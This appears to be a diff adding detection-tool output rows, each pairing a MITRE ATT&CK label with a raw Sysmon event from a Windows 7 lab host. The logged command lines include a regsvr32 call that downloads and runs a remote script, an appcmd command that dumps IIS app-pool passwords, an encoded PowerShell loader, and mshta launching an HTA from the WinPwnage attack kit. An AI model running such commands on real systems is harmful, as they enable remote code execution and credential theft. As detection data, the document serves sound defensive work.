+    <Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Microsoft(C) Register Server</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">/u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-433D-5CE0-0000-002031350100</Data>
+    <Data Name=""LogonId"">0x13531</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-433C-5CE0-0000-00100FD20000</Data>
+    <Data Name=""ParentProcessId"">964</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:29:17.891593Z"">
+    </TimeCreated>
+    <EventRecordID>5904</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:29:17.851</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010C47BFF00</Data>
+    <Data Name=""ProcessId"">560</Data>
+    <Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
+    <Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Application Server Command Line Admin Tool</Data>
+    <Data Name=""Product"">Internet Information Services</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot;  list apppool /text:processmodel.password</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ParentProcessId"">2584</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:54.632117Z"">
+    </TimeCreated>
+    <EventRecordID>6192</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:54.612</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001015780C00</Data>
+    <Data Name=""ProcessId"">1260</Data>
+    <Data Name=""Image"">\Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe</Data>
+    <Data Name=""FileVersion"">?</Data>
+    <Data Name=""Description"">?</Data>
+    <Data Name=""Product"">?</Data>
+    <Data Name=""Company"">?</Data>
+    <Data Name=""CommandLine"">\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FE6C-5CEB-0000-00104A170C00</Data>
+    <Data Name=""ParentProcessId"">3680</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T15:12:54.632117Z"">
+    </TimeCreated>
+    <EventRecordID>6192</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""980"" ThreadID=""2220"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 15:12:54.612</Data>
+    <Data Name=""ProcessGuid"">365ABB72-FE76-5CEB-0000-001015780C00</Data>
+    <Data Name=""ProcessId"">1260</Data>
+    <Data Name=""Image"">\Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe</Data>
+    <Data Name=""FileVersion"">?</Data>
+    <Data Name=""Description"">?</Data>
+    <Data Name=""Product"">?</Data>
+    <Data Name=""Company"">?</Data>
+    <Data Name=""CommandLine"">\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-FE6C-5CEB-0000-00104A170C00</Data>
+    <Data Name=""ParentProcessId"">3680</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( &quot;C:\Windows\system32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T17:01:51.007950Z"">
+    </TimeCreated>
+    <EventRecordID>16498</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2012"" ThreadID=""300"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 17:01:50.852</Data>
+    <Data Name=""ProcessGuid"">365ABB72-517E-5CD8-0000-00105FE01700</Data>
+    <Data Name=""ProcessId"">2920</Data>
+    <Data Name=""Image"">C:\Windows\System32\calc.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows Calculator</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\calc.exe&quot; </Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
+    <Data Name=""LogonId"">0x135f2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-517E-5CD8-0000-001024D61700</Data>
+    <Data Name=""ParentProcessId"">2952</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\pcalua.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\pcalua.exe&quot;  -a c:\Windows\system32\calc.exe</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
+    </TimeCreated>
+    <EventRecordID>16396</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
+    <Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
+    <Data Name=""ProcessId"">2964</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
+    <Data Name=""ParentProcessId"">3856</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; ) contain suspicious command ( \mshta.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
+    </TimeCreated>
+    <EventRecordID>16396</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
+    <Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
+    <Data Name=""ProcessId"">2964</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
+    <Data Name=""ParentProcessId"">3856</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1170] Detecting  Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line (&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot;) and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:38:00.712733Z"">
+    </TimeCreated>
+    <EventRecordID>16396</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:38:00.592</Data>
+    <Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010E4E82600</Data>
+    <Data Name=""ProcessId"">2964</Data>
+    <Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
+    <Data Name=""FileVersion"">11.00.9600.16428 (winblue_gdr.131013-1700)</Data>
+    <Data Name=""Description"">Microsoft (R) HTML Application host</Data>
+    <Data Name=""Product"">Internet Explorer</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\mshta.exe&quot; &quot;C:\programdata\calc.hta&quot; </Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
+    <Data Name=""ParentProcessId"">3856</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""ParentCommandLine"">rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-21T00:35:07.474160Z"">
+    </TimeCreated>
+    <EventRecordID>374</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3416"" ThreadID=""3496"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-21 00:35:07.386</Data>
+    <Data Name=""ProcessGuid"">365ABB72-47BB-5CE3-0000-001071AD3E00</Data>
+    <Data Name=""ProcessId"">3944</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">C:\Windows\system32\cmd.exe /c test.bat</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
+    <Data Name=""LogonId"">0xc796</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
